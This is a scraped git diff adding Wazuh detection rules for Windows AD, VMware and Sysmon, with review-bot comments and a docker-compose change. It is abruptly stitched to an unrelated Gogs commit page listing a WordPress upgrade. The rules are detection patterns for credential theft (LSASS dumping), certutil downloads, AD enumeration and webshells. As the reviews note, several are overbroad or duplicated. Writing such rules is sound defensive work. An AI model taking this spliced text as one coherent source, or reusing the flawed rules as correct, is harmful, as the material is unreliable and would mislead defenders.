+  <rule id="110342" level="8">
59
+    <if_sid>60105, 60122</if_sid>
60
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
61
+    <description>A4-02 [PROD] Windows: service account auth failure (4625)</description>
62
+    <group>soc_prod,a4,auth_fail,</group>
63
+    <mitre><id>T1110.001</id></mitre>
64
+  </rule>
65
+
66
+  <rule id="110359" level="5">
67
+    <if_sid>60105, 60122</if_sid>
68
+    <description>A4-19 [PROD] Windows: authentication failure (4625)</description>
69
+    <group>soc_prod,a4,spray,</group>
70
+    <mitre><id>T1110.003</id></mitre>
71
+  </rule>
72
+
73
+  <!-- A4-03: AD enumeration via process execution (event 4688)
74
+       Parent: 67027 (new process created) -->
75
+  <rule id="110343" level="8">
76
+    <if_sid>67027</if_sid>
77
+    <field name="win.eventdata.newProcessName" type="pcre2">(?i)adfind\.exe</field>
78
+    <description>A4-03 [PROD] Windows AD: adfind enumeration tool executed (4688)</description>
79
+    <group>soc_prod,a4,ad_enum,</group>
80
+    <mitre><id>T1087.002</id></mitre>
81
+  </rule>
82
+
83
+  <!-- A4-06/07/08/09/10: Auth successes (event 4624)
84
+       Parent: 60106 (logon success) -->
85
+  <rule id="110346" level="12">
86
+    <if_sid>60106</if_sid>
87
+    <field name="win.eventdata.logonType">^10$</field>
88
+    <description>A4-06 [PROD] Windows: remote interactive auth success logon type 10 (4624)</description>
89
+    <group>soc_prod,a4,auth_success,remote,</group>
90
+    <mitre><id>T1021.001</id></mitre>
91
+    <mitre><id>T1078</id></mitre>
92
+  </rule>
93
+
94
+  <rule id="110348" level="12">
95
+    <if_sid>60106</if_sid>
96
+    <field name="win.eventdata.authenticationPackageName">NTLM</field>
97
+    <field name="win.eventdata.logonType">^3$</field>
98
+    <description>A4-08 [PROD] Windows: NTLM network logon type 3 — pass-the-hash indicator (4624)</description>
99
+    <group>soc_prod,a4,pth,</group>
100
+    <mitre><id>T1550.002</id></mitre>
101
+  </rule>
102
+
103
+  <rule id="110349" level="12">
104
+    <if_sid>60106</if_sid>
105
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)^guest$</field>
106
+    <description>A4-09 [PROD] Windows: guest account auth success (4624)</description>
107
+    <group>soc_prod,a4,auth_success,guest,</group>
108
+    <mitre><id>T1078.001</id></mitre>
109
+  </rule>
110
+
111
+  <rule id="110350" level="12">
112
+    <if_sid>60106</if_sid>
113
+    <field name="win.eventdata.logonType">^2$</field>
114
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
115
+    <description>A4-10 [PROD] Windows: service account interactive logon type 2 (4624)</description>
116
+    <group>soc_prod,a4,service_account,</group>
117
+    <mitre><id>T1078.003</id></mitre>
118
+  </rule>
119
+
120
+  <!-- A4-11/12: Group membership changes (events 4728/4732)
121
+       Parent: 60113 (member added to security-enabled group) -->
122
+  <rule id="110352" level="12">
123
+    <if_sid>60113</if_sid>
124
+    <field name="win.system.eventID">^4728$</field>
125
+    <description>A4-12 [PROD] Windows: account added to privileged domain group (4728)</description>
126
+    <group>soc_prod,a4,privilege_escalation,</group>
127
+    <mitre><id>T1098.007</id></mitre>
128
+  </rule>
129
+
130
+  <rule id="110353" level="12">
131
+    <if_sid>60113</if_sid>
132
+    <field name="win.system.eventID">^4732$</field>
133
+    <description>A4-11 [PROD] Windows: account added to privileged local group (4732)</description>
134
+    <group>soc_prod,a4,privilege_escalation,</group>
135
+    <mitre><id>T1098.007</id></mitre>
136
+  </rule>
137
+
138
+  <!-- A4-13: DSRM password set (event 4794)
139
+       Parent: 60103 -->
140
+  <rule id="110354" level="12">
141
+    <if_sid>60103</if_sid>
142
+    <description>A4-13 [PROD] Windows DC: DSRM account password set (4794)</description>
143
+    <group>soc_prod,a4,persistence,</group>
144
+    <mitre><id>T1098</id></mitre>
145
+  </rule>
146
+
147
+  <!-- A4-21/22/23/24: Account lifecycle (events 4720/4722)
148
+       Parent: 60109 (account created/enabled) -->
149
+  <rule id="110361" level="5">
150
+    <if_sid>60109</if_sid>
151
+    <field name="win.system.eventID">^4720$</field>
152
+    <description>A4-21/23 [PROD] Windows: new user account created (4720)</description>
153
+    <group>soc_prod,a4,account_create,</group>
154
+    <mitre><id>T1136</id></mitre>
155
+  </rule>
156
+
157
+  <rule id="110362" level="5">
158
+    <if_sid>60109</if_sid>
159
+    <field name="win.system.eventID">^4722$</field>
160
+    <description>A4-22/24 [PROD] Windows: user account re-enabled (4722)</description>
161
+    <group>soc_prod,a4,account_lifecycle,</group>
162
+    <mitre><id>T1078</id></mitre>
163
+  </rule>
164
+
165
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
166
+
167
+
168
+</group>
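Review bot: Rules 110352 and 110353 alert at level 12 on every 4728/4732 event, but nothing in them tests the target group, so the "privileged domain group" and "privileged local group" in the descriptions is not enforced. Add a `<field>` condition on the group name or SID for the groups you treat as privileged. In 110342 and 110350 the `\$$` alternative in `(?i)svc|service|\$$` matches every computer account (names ending in `$`), and `(?i)admin` in 110341 is unanchored, so both will label unrelated accounts. 110359 is grouped as `spray` with T1110.003 yet fires on each single 4625 with no `frequency`/`timeframe`, and as a sibling of 110341/110342 under the same parents it needs a comment on which rule is expected to win.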

+ 44 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b1-vmware-rules.xml

@@ -0,0 +1,44 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix B1: VMware vCenter / ESXi
3
+  Simulation profile rule IDs : 100401-100403
4
+  Production profile rule IDs : 110401-110403
5
+-->
6
+<group name="soc_mvp,appendix_b,b1,vmware,">
7
+
8
+  <!-- ── Simulation profile ── -->
9
+
10
+
11
+
12
+
13
+  <!-- ── Production profile (if_group=vmware + real log patterns) ── -->
14
+
15
+  <rule id="110401" level="12">
16
+    <if_group>vmware</if_group>
17
+    <match>Login failure</match>
18
+    <description>B1-01 [PROD] vCenter: login failure detected (brute-force indicator)</description>
19
+    <group>soc_prod,b1,vcenter,auth,</group>
20
+    <mitre><id>T1110</id></mitre>
21
+  </rule>
22
+
23
+  <rule id="110402" level="8">
24
+    <if_group>vmware</if_group>
25
+    <match>SSH login is enabled</match>
26
+    <description>B1-02 [PROD] ESXi: SSH service enabled on host</description>
27
+    <group>soc_prod,b1,esxi,ssh,</group>
28
+    <mitre><id>T1021.004</id></mitre>
29
+  </rule>
30
+
31
+  <rule id="110403" level="12">
32
+    <if_group>vmware</if_group>
33
+    <match>sshd</match>
34
+    <description>B1-03 [PROD] ESXi: SSH authentication event detected</description>
35
+    <group>soc_prod,b1,esxi,ssh,</group>
36
+    <mitre><id>T1021.004</id></mitre>
37
+  </rule>
38
+
39
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
40
+
41
+
42
+
43
+
44
+</group>
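Review bot: 110403 raises a level 12 alert for any vmware-group event that contains the substring `sshd`, which is broader than the "SSH authentication event" in its description. Narrow the match to the authentication messages you want, or lower the level. 110401 has the same shape: a single `Login failure` line is level 12 and described as a brute-force indicator, with no `frequency` or `timeframe` to establish repetition.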

+ 22 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b2-logmon-rules.xml

@@ -0,0 +1,22 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix B2: Log Monitoring
3
+  Simulation profile rule IDs : 100411
4
+  Production profile rule IDs : 110411
5
+-->
6
+<group name="soc_mvp,appendix_b,b2,logmonitor,">
7
+
8
+  <!-- ── Simulation profile ── -->
9
+
10
+
11
+  <!-- ── Production profile (anchored to 100260 = soc-prod-integrator) ── -->
12
+
13
+  <rule id="110411" level="5">
14
+    <if_sid>100260</if_sid>
15
+    <match>event_type=log_loss_detection</match>
16
+    <description>B2-01 [PROD] Log Monitor: log ingestion loss detected on monitored stream</description>
17
+    <group>soc_prod,b2,log_loss,</group>
18
+    <mitre><id>T1562.006</id></mitre>
19
+  </rule>
20
+
21
+
22
+</group>

+ 97 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml

@@ -0,0 +1,97 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix B3: Windows Sysmon
3
+  Simulation profile rule IDs : 100421-100426
4
+  Production profile rule IDs : 110421-110426
5
+
6
+  Production rules use specific built-in Wazuh Sysmon SIDs as parents
7
+  to avoid the N×M rule-tree explosion from if_group=sysmon:
8
+    61603 → Sysmon event 1  (process create)
9
+    61612 → Sysmon event 10 (process access)
10
+    61613 → Sysmon event 11 (file create)
11
+-->
12
+<group name="soc_mvp,appendix_b,b3,sysmon,">
13
+
14
+  <!-- ── Simulation profile ── -->
15
+
16
+
17
+
18
+
19
+
20
+
21
+
22
+  <!-- ── Production profile ──
23
+       Parents are specific built-in Wazuh Sysmon SIDs (not if_group=sysmon)
24
+       to avoid N×M rule-tree explosion.
25
+  -->
26
+
27
+  <!-- B3-01: LSASS process access via procdump (Sysmon event 10)
28
+       Parent: 61612 (Sysmon event 10 - process access) -->
29
+  <rule id="110421" level="12">
30
+    <if_sid>61612</if_sid>
31
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
32
+    <description>B3-01 [PROD] Sysmon: LSASS process access detected (event 10)</description>
33
+    <group>soc_prod,b3,credential_access,lsass,</group>
34
+    <mitre><id>T1003.001</id></mitre>
35
+  </rule>
36
+
37
+  <!-- B3-02: SQL injection keywords in process command line (Sysmon event 1)
38
+       Parent: 61603 (Sysmon event 1 - process create) -->
39
+  <rule id="110422" level="12">
40
+    <if_sid>61603</if_sid>
41
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)select|union|insert|drop|exec</field>
42
+    <description>B3-02 [PROD] Sysmon: SQL keyword in process command line (event 1)</description>
43
+    <group>soc_prod,b3,webapp,sqli,</group>
44
+    <mitre><id>T1190</id></mitre>
45
+  </rule>
46
+
47
+  <!-- B3-03: Web script file creation (Sysmon event 11)
48
+       Parent: 61613 (Sysmon event 11 - file create) -->
49
+  <rule id="110423" level="12">
50
+    <if_sid>61613</if_sid>
51
+    <field name="win.eventdata.targetFilename" type="pcre2">\.(?:php|aspx|asp|jsp)$</field>
52
+    <description>B3-03 [PROD] Sysmon: web script file created (possible webshell, event 11)</description>
53
+    <group>soc_prod,b3,webapp,webshell,</group>
54
+    <mitre><id>T1505.003</id></mitre>
55
+  </rule>
56
+
57
+  <!-- B3-04: msiexec uninstall (Sysmon event 1)
58
+       Parent: 61603 (Sysmon event 1 - process create) -->
59
+  <rule id="110424" level="12">
60
+    <if_sid>61603</if_sid>
61
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec</field>
62
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)/x|/uninstall</field>
63
+    <description>B3-04 [PROD] Sysmon: msiexec uninstall detected (event 1)</description>
64
+    <group>soc_prod,b3,defense_evasion,</group>
65
+    <mitre><id>T1562.001</id></mitre>
66
+  </rule>
67
+
68
+  <!-- B3-05: LSASS dump via Task Manager (Sysmon event 10)
69
+       Parent: 61612 (Sysmon event 10 - process access) -->
70
+  <rule id="110425" level="12">
71
+    <if_sid>61612</if_sid>
72
+    <field name="win.eventdata.sourceImage" type="pcre2">(?i)Taskmgr\.exe</field>
73
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
74
+    <description>B3-05 [PROD] Sysmon: LSASS dump via Task Manager (event 10)</description>
75
+    <group>soc_prod,b3,credential_access,lsass,</group>
76
+    <mitre><id>T1003.001</id></mitre>
77
+  </rule>
78
+
79
+  <!-- B3-06: certutil download (Sysmon event 1)
80
+       Parent: 61603 (Sysmon event 1 - process create) -->
81
+  <rule id="110426" level="8">
82
+    <if_sid>61603</if_sid>
83
+    <field name="win.eventdata.image" type="pcre2">(?i)certutil\.exe</field>
84
+    <description>B3-06 [PROD] Sysmon: certutil.exe execution detected (event 1)</description>
85
+    <group>soc_prod,b3,download,</group>
86
+    <mitre><id>T1105</id></mitre>
87
+  </rule>
88
+
89
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
90
+
91
+
92
+
93
+
94
+
95
+
96
+
97
+</group>
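Review bot: The pattern in 110422, `(?i)select|union|insert|drop|exec`, has no word boundaries and runs against every Sysmon event 1 command line at level 12, so it matches `msiexec`, `Select-Object` and other ordinary commands. It also overlaps 110424 (same parent 61603, same level): any msiexec command line contains `exec`, and Wazuh emits one alert per event, so one of the two siblings is shadowed. Anchor the keywords with `\b` and scope the rule to the web or database process images. 110421 and 110425 overlap the same way under 61612, since every Taskmgr-to-lsass access already satisfies 110421. 110423 lacks `(?i)`, so an upper-case extension such as `.ASPX` is missed.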

+ 134 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-c1-c3-rules.xml

@@ -0,0 +1,134 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix C1-C3
3
+  C1: Impossible Travel
4
+  C2: Advanced Credential Abuse & Privilege Misuse
5
+  C3: Lateral Movement & Internal Reconnaissance
6
+
7
+  Simulation profile rule IDs : 100501, 100511-100514, 100521-100524
8
+  Production profile rule IDs : 110501, 110502, 110511-110514, 110521-110524
9
+
10
+  C1 prod: if_group=fortigate (VPN) or if_sid=100260 (soc-integrator)
11
+  C2/C3 prod: specific built-in Wazuh SIDs to avoid N×M explosion:
12
+    60106 → event 4624 (auth success / logon)
13
+    60113 → events 4728/4732 (group membership change)
14
+-->
15
+<group name="soc_mvp,appendix_c,">
16
+
17
+  <!-- ================================================================
18
+       C1: Impossible Travel Detection
19
+       ================================================================ -->
20
+
21
+
22
+  <rule id="110501" level="12">
23
+    <if_group>fortigate</if_group>
24
+    <match>action="ssl-login-success"</match>
25
+    <description>C1-01 [PROD] VPN login success with geo context — impossible travel candidate</description>
26
+    <group>soc_prod,c1,impossible_travel,identity,</group>
27
+    <mitre><id>T1078</id></mitre>
28
+  </rule>
29
+
30
+  <rule id="110502" level="15">
31
+    <if_sid>100260</if_sid>
32
+    <match>event_type=c1_impossible_travel</match>
33
+    <description>C1-01 [PROD] Impossible travel confirmed by soc-integrator correlation</description>
34
+    <group>soc_prod,c1,impossible_travel,identity,</group>
35
+    <mitre><id>T1078</id></mitre>
36
+  </rule>
37
+
38
+
39
+
40
+  <!-- ================================================================
41
+       C2: Advanced Credential Abuse & Privilege Misuse
42
+       ================================================================ -->
43
+
44
+
45
+
46
+
47
+
48
+  <!-- C2 production rules
49
+       Parent: 60106 (event 4624 - logon success) for auth rules
50
+               60113 (events 4728/4732 - group membership) for privilege rules -->
51
+
52
+  <rule id="110511" level="12">
53
+    <if_sid>60106</if_sid>
54
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
55
+    <description>C2-01 [PROD] Privileged account auth success (4624)</description>
56
+    <group>soc_prod,c2,credential_abuse,identity,</group>
57
+    <mitre><id>T1078.002</id></mitre>
58
+  </rule>
59
+
60
+  <rule id="110512" level="8">
61
+    <if_sid>60106</if_sid>
62
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)legacy</field>
63
+    <description>C2-02 [PROD] Dormant/legacy account auth success (4624)</description>
64
+    <group>soc_prod,c2,credential_abuse,identity,</group>
65
+    <mitre><id>T1078</id></mitre>
66
+  </rule>
67
+
68
+  <rule id="110513" level="12">
69
+    <if_sid>60106</if_sid>
70
+    <field name="win.eventdata.logonType">^10$</field>
71
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
72
+    <description>C2-03 [PROD] Service account remote interactive logon type 10 (4624)</description>
73
+    <group>soc_prod,c2,service_account,identity,</group>
74
+    <mitre><id>T1078.003</id></mitre>
75
+  </rule>
76
+
77
+  <rule id="110514" level="12">
78
+    <if_sid>60113</if_sid>
79
+    <field name="win.system.eventID">^4732$</field>
80
+    <description>C2-04 [PROD] Privilege escalation: group membership change (4732)</description>
81
+    <group>soc_prod,c2,privilege_escalation,identity,</group>
82
+    <mitre><id>T1098.007</id></mitre>
83
+  </rule>
84
+
85
+
86
+
87
+
88
+
89
+  <!-- ================================================================
90
+       C3: Lateral Movement & Internal Reconnaissance
91
+       ================================================================ -->
92
+
93
+
94
+
95
+
96
+
97
+  <!-- C3 production rules
98
+       Parent: 60106 (event 4624 - logon success) -->
99
+
100
+  <rule id="110521" level="12">
101
+    <if_sid>60106</if_sid>
102
+    <field name="win.eventdata.logonType">^10$</field>
103
+    <description>C3-01/02 [PROD] RDP auth success logon type 10 (lateral movement indicator)</description>
104
+    <group>soc_prod,c3,lateral_movement,rdp,</group>
105
+    <mitre><id>T1021.001</id></mitre>
106
+    <mitre><id>T1078</id></mitre>
107
+  </rule>
108
+
109
+  <rule id="110522" level="12">
110
+    <if_sid>60106</if_sid>
111
+    <field name="win.eventdata.logonType">^3$</field>
112
+    <description>C3-02 [PROD] SMB network logon type 3 (lateral movement indicator)</description>
113
+    <group>soc_prod,c3,lateral_movement,smb,</group>
114
+    <mitre><id>T1021.002</id></mitre>
115
+    <mitre><id>T1078</id></mitre>
116
+  </rule>
117
+
118
+  <rule id="110523" level="15">
119
+    <if_sid>60106</if_sid>
120
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
121
+    <description>C3-03 [PROD] Admin account auth success — lateral movement candidate (4624)</description>
122
+    <group>soc_prod,c3,lateral_movement,admin,</group>
123
+    <mitre><id>T1021.001</id></mitre>
124
+    <mitre><id>T1078.002</id></mitre>
125
+  </rule>
126
+
127
+  <!-- C3-04 PROD: WFP event 5156 has no specific built-in Wazuh parent SID.
128
+       Skip prod rule to avoid N×M explosion from using a generic windows parent. -->
129
+
130
+
131
+
132
+
133
+
134
+</group>
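Review bot: 110511 and 110523 have identical conditions (`<if_sid>60106</if_sid>` plus `targetUserName` matching `(?i)admin`) but different levels (12 and 15) and different MITRE tags, so one of them can never produce an alert. Neither encodes what its description says: both fire on any successful logon by an account with "admin" anywhere in its name, with no off-hours or lateral-movement condition. The same applies to 110521 versus 110513 (both test `logonType` `^10$` under 60106) and to 110522, which marks every type 3 network logon as level 12. 110501 alerts at level 12 on every `ssl-login-success`; if it is only a feed for the correlation that produces 110502, drop it to a low level so it does not page on normal VPN use.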

+ 8 - 0
wazuh-docker/single-node/docker-compose.yml

@@ -44,6 +44,14 @@ services:
44 44
       - ./config/wazuh_cluster/wazuh_manager.conf:/var/ossec/etc/ossec.conf
45 45
       - ./config/wazuh_cluster/local_decoder.xml:/var/ossec/etc/decoders/local_decoder.xml
46 46
       - ./config/wazuh_cluster/local_rules.xml:/var/ossec/etc/rules/local_rules.xml
47
+      - ./config/wazuh_cluster/rules/soc-a1-ioc-rules.xml:/var/ossec/etc/rules/soc-a1-ioc-rules.xml
48
+      - ./config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml:/var/ossec/etc/rules/soc-a2-fortigate-fw-rules.xml
49
+      - ./config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml:/var/ossec/etc/rules/soc-a3-fortigate-vpn-rules.xml
50
+      - ./config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml:/var/ossec/etc/rules/soc-a4-windows-ad-rules.xml
51
+      - ./config/wazuh_cluster/rules/soc-b1-vmware-rules.xml:/var/ossec/etc/rules/soc-b1-vmware-rules.xml
52
+      - ./config/wazuh_cluster/rules/soc-b2-logmon-rules.xml:/var/ossec/etc/rules/soc-b2-logmon-rules.xml
53
+      - ./config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml:/var/ossec/etc/rules/soc-b3-sysmon-rules.xml
54
+      - ./config/wazuh_cluster/rules/soc-c1-c3-rules.xml:/var/ossec/etc/rules/soc-c1-c3-rules.xml
47 55
 
48 56
   wazuh.indexer:
49 57
     image: wazuh/wazuh-indexer:4.14.3
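Review bot: The eight rule-file bind mounts added at lines 47-54 are writable from inside the manager container. These files are tracked in the repository, so append `:ro` to each entry; that keeps changes made inside the container (through the API or otherwise) from silently modifying the checked-in detection rules on the host. Mounting each file individually also means a new rules file needs a compose change before it loads, which is worth a comment next to the list.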

config · 92ae4370cd - Gogs: Simplico Git Service
Tum 3 years ago
parent
commit
92ae4370cd
100 changed files with 1724 additions and 773 deletions
  1. 1 1
      app/license.txt
  2. 8 8
      app/readme.html
  3. 177 156
      app/wp-admin/about.php
  4. 4 3
      app/wp-admin/admin-ajax.php
  5. 21 5
      app/wp-admin/admin-header.php
  6. 16 1
      app/wp-admin/admin-post.php
  7. 19 8
      app/wp-admin/admin.php
  8. 1 1
      app/wp-admin/async-upload.php
  9. 27 14
      app/wp-admin/authorize-application.php
  10. 3 1
      app/wp-admin/comment.php
  11. 8 1
      app/wp-admin/credits.php
  12. 152 91
      app/wp-admin/css/about-rtl.css
  13. 1 1
      app/wp-admin/css/about-rtl.min.css
  14. 152 91
      app/wp-admin/css/about.css
  15. 1 1
      app/wp-admin/css/about.min.css
  16. 5 6
      app/wp-admin/css/admin-menu-rtl.css
  17. 1 1
      app/wp-admin/css/admin-menu-rtl.min.css
  18. 5 6
      app/wp-admin/css/admin-menu.css
  19. 1 1
      app/wp-admin/css/admin-menu.min.css
  20. 1 1
      app/wp-admin/css/color-picker-rtl.css
  21. 1 1
      app/wp-admin/css/color-picker.css
  22. 17 0
      app/wp-admin/css/colors/_admin.scss
  23. 7 0
      app/wp-admin/css/colors/_variables.scss
  24. 17 0
      app/wp-admin/css/colors/blue/colors-rtl.css
  25. 1 1
      app/wp-admin/css/colors/blue/colors-rtl.min.css
  26. 17 0
      app/wp-admin/css/colors/blue/colors.css
  27. 1 1
      app/wp-admin/css/colors/blue/colors.min.css
  28. 3 0
      app/wp-admin/css/colors/blue/colors.scss
  29. 26 9
      app/wp-admin/css/colors/coffee/colors-rtl.css
  30. 1 1
      app/wp-admin/css/colors/coffee/colors-rtl.min.css
  31. 26 9
      app/wp-admin/css/colors/coffee/colors.css
  32. 1 1
      app/wp-admin/css/colors/coffee/colors.min.css
  33. 1 0
      app/wp-admin/css/colors/coffee/colors.scss
  34. 17 0
      app/wp-admin/css/colors/ectoplasm/colors-rtl.css
  35. 1 1
      app/wp-admin/css/colors/ectoplasm/colors-rtl.min.css
  36. 17 0
      app/wp-admin/css/colors/ectoplasm/colors.css
  37. 1 1
      app/wp-admin/css/colors/ectoplasm/colors.min.css
  38. 1 0
      app/wp-admin/css/colors/ectoplasm/colors.scss
  39. 17 0
      app/wp-admin/css/colors/light/colors-rtl.css
  40. 1 1
      app/wp-admin/css/colors/light/colors-rtl.min.css
  41. 17 0
      app/wp-admin/css/colors/light/colors.css
  42. 1 1
      app/wp-admin/css/colors/light/colors.min.css
  43. 4 0
      app/wp-admin/css/colors/light/colors.scss
  44. 26 9
      app/wp-admin/css/colors/midnight/colors-rtl.css
  45. 1 1
      app/wp-admin/css/colors/midnight/colors-rtl.min.css
  46. 26 9
      app/wp-admin/css/colors/midnight/colors.css
  47. 1 1
      app/wp-admin/css/colors/midnight/colors.min.css
  48. 3 0
      app/wp-admin/css/colors/midnight/colors.scss
  49. 26 9
      app/wp-admin/css/colors/modern/colors-rtl.css
  50. 1 1
      app/wp-admin/css/colors/modern/colors-rtl.min.css
  51. 26 9
      app/wp-admin/css/colors/modern/colors.css
  52. 1 1
      app/wp-admin/css/colors/modern/colors.min.css
  53. 5 0
      app/wp-admin/css/colors/modern/colors.scss
  54. 17 0
      app/wp-admin/css/colors/ocean/colors-rtl.css
  55. 1 1
      app/wp-admin/css/colors/ocean/colors-rtl.min.css
  56. 17 0
      app/wp-admin/css/colors/ocean/colors.css
  57. 1 1
      app/wp-admin/css/colors/ocean/colors.min.css
  58. 1 0
      app/wp-admin/css/colors/ocean/colors.scss
  59. 26 9
      app/wp-admin/css/colors/sunrise/colors-rtl.css
  60. 1 1
      app/wp-admin/css/colors/sunrise/colors-rtl.min.css
  61. 26 9
      app/wp-admin/css/colors/sunrise/colors.css
  62. 1 1
      app/wp-admin/css/colors/sunrise/colors.min.css
  63. 1 0
      app/wp-admin/css/colors/sunrise/colors.scss
  64. 22 25
      app/wp-admin/css/common-rtl.css
  65. 2 2
      app/wp-admin/css/common-rtl.min.css
  66. 22 25
      app/wp-admin/css/common.css
  67. 2 2
      app/wp-admin/css/common.min.css
  68. 54 15
      app/wp-admin/css/customize-controls-rtl.css
  69. 1 1
      app/wp-admin/css/customize-controls-rtl.min.css
  70. 54 15
      app/wp-admin/css/customize-controls.css
  71. 1 1
      app/wp-admin/css/customize-controls.min.css
  72. 10 10
      app/wp-admin/css/customize-nav-menus-rtl.css
  73. 1 1
      app/wp-admin/css/customize-nav-menus-rtl.min.css
  74. 10 10
      app/wp-admin/css/customize-nav-menus.css
  75. 1 1
      app/wp-admin/css/customize-nav-menus.min.css
  76. 1 1
      app/wp-admin/css/customize-widgets-rtl.css
  77. 1 1
      app/wp-admin/css/customize-widgets-rtl.min.css
  78. 1 1
      app/wp-admin/css/customize-widgets.css
  79. 1 1
      app/wp-admin/css/customize-widgets.min.css
  80. 225 59
      app/wp-admin/css/dashboard-rtl.css
  81. 1 1
      app/wp-admin/css/dashboard-rtl.min.css
  82. 225 59
      app/wp-admin/css/dashboard.css
  83. 1 1
      app/wp-admin/css/dashboard.min.css
  84. 1 1
      app/wp-admin/css/deprecated-media-rtl.css
  85. 1 1
      app/wp-admin/css/deprecated-media-rtl.min.css
  86. 1 1
      app/wp-admin/css/deprecated-media.css
  87. 1 1
      app/wp-admin/css/deprecated-media.min.css
  88. 17 11
      app/wp-admin/css/edit-rtl.css
  89. 1 1
      app/wp-admin/css/edit-rtl.min.css
  90. 17 11
      app/wp-admin/css/edit.css
  91. 1 1
      app/wp-admin/css/edit.min.css
  92. 15 8
      app/wp-admin/css/forms-rtl.css
  93. 1 1
      app/wp-admin/css/forms-rtl.min.css
  94. 15 8
      app/wp-admin/css/forms.css
  95. 1 1
      app/wp-admin/css/forms.min.css
  96. 3 3
      app/wp-admin/css/install-rtl.css
  97. 1 1
      app/wp-admin/css/install-rtl.min.css
  98. 3 3
      app/wp-admin/css/install.css
  99. 1 1
      app/wp-admin/css/install.min.css
  100. 0 0
      app/wp-admin/css/list-tables-rtl.css

+ 1 - 1
app/license.txt

@@ -1,6 +1,6 @@
1 1
 WordPress - Web publishing software
2 2
 
3
-Copyright 2011-2021 by the contributors
3
+Copyright 2011-2022 by the contributors
4 4
 
5 5
 This program is free software; you can redistribute it and/or modify
6 6
 it under the terms of the GNU General Public License as published by

+ 8 - 8
app/readme.html

@@ -13,7 +13,7 @@
13 13
 <p style="text-align: center">Semantic Personal Publishing Platform</p>
14 14
 
15 15
 <h2>First Things First</h2>
16
-<p>Welcome. WordPress is a very special project to me. Every developer and contributor adds something unique to the mix, and together we create something beautiful that I&#8217;m proud to be a part of. Thousands of hours have gone into WordPress, and we&#8217;re dedicated to making it better every day. Thank you for making it part of your world.</p>
16
+<p>Welcome. WordPress is a very special project to me. Every developer and contributor adds something unique to the mix, and together we create something beautiful that I am proud to be a part of. Thousands of hours have gone into WordPress, and we are dedicated to making it better every day. Thank you for making it part of your world.</p>
17 17
 <p style="text-align: right">&#8212; Matt Mullenweg</p>
18 18
 
19 19
 <h2>Installation: Famous 5-minute install</h2>
@@ -21,7 +21,7 @@
21 21
 	<li>Unzip the package in an empty directory and upload everything.</li>
22 22
 	<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser. It will take you through the process to set up a <code>wp-config.php</code> file with your database connection details.
23 23
 		<ol>
24
-			<li>If for some reason this doesn&#8217;t work, don&#8217;t worry. It doesn&#8217;t work on all web hosts. Open up <code>wp-config-sample.php</code> with a text editor like WordPad or similar and fill in your database connection details.</li>
24
+			<li>If for some reason this does not work, do not worry. It may not work on all web hosts. Open up <code>wp-config-sample.php</code> with a text editor like WordPad or similar and fill in your database connection details.</li>
25 25
 			<li>Save the file as <code>wp-config.php</code> and upload it.</li>
26 26
 			<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser.</li>
27 27
 		</ol>
@@ -51,21 +51,21 @@
51 51
 
52 52
 <h2>System Requirements</h2>
53 53
 <ul>
54
-	<li><a href="https://secure.php.net/">PHP</a> version <strong>5.6.20</strong> or higher.</li>
55
-	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.0</strong> or higher.</li>
54
+	<li><a href="https://secure.php.net/">PHP</a> version <strong>5.6.20</strong> or greater.</li>
55
+	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.0</strong> or greater.</li>
56 56
 </ul>
57 57
 
58 58
 <h3>Recommendations</h3>
59 59
 <ul>
60
-	<li><a href="https://secure.php.net/">PHP</a> version <strong>7.4</strong> or higher.</li>
61
-	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.6</strong> or higher.</li>
60
+	<li><a href="https://secure.php.net/">PHP</a> version <strong>7.4</strong> or greater.</li>
61
+	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.7</strong> or greater OR <a href="https://mariadb.org/">MariaDB</a> version <strong>10.2</strong> or greater.</li>
62 62
 	<li>The <a href="https://httpd.apache.org/docs/2.2/mod/mod_rewrite.html">mod_rewrite</a> Apache module.</li>
63 63
 	<li><a href="https://wordpress.org/news/2016/12/moving-toward-ssl/">HTTPS</a> support.</li>
64 64
 	<li>A link to <a href="https://wordpress.org/">wordpress.org</a> on your site.</li>
65 65
 </ul>
66 66
 
67 67
 <h2>Online Resources</h2>
68
-<p>If you have any questions that aren&#8217;t addressed in this document, please take advantage of WordPress&#8217; numerous online resources:</p>
68
+<p>If you have any questions that are not addressed in this document, please take advantage of WordPress&#8217; numerous online resources:</p>
69 69
 <dl>
70 70
 	<dt><a href="https://codex.wordpress.org/">The WordPress Codex</a></dt>
71 71
 		<dd>The Codex is the encyclopedia of all things WordPress. It is the most comprehensive source of information for WordPress available.</dd>
@@ -74,7 +74,7 @@
74 74
